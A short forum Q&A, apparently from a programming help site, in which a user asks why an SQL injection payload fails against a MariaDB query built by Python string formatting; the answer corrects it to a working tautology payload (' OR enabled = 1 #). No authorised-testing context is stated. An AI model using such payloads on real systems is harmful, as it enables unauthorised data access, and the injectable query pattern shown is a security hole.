# SQl Injection MariaDB

Tags: sql-injection, mariadb

Im found a sql query that is injectable below

```
"car_info = query("select models, color, running from cars where manual = 1 AND UID = '{}' LIMIT 1".format(uid))")
```

Where '{}' is the point of injection.

The payload I am trying to enter is:

```
' OR enabled = 1") #
```

I am being returned an error below:

```
(1064, u\"You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ')#' LIMIT 1' at line 1\
```

How can i get this to properly execute? I feel like I am close.

Answer (score 1):

If I am reading the syntax correctly, I believe you need to *remove your quotations and left parenthesis* as it's prematurely ending the query function:

```
car_info = query("select models, color, running from cars where manual = 1 AND UID = '' OR enabled = 1 # LIMIT 1".format(uid))")
```

You are posting:

```
car_info = query("select models, color, running from cars where manual = 1 AND UID = '' OR enabled = 1" )# LIMIT 1".format(uid))")
```

So try the payload:

```
' OR enabled = 1 #
```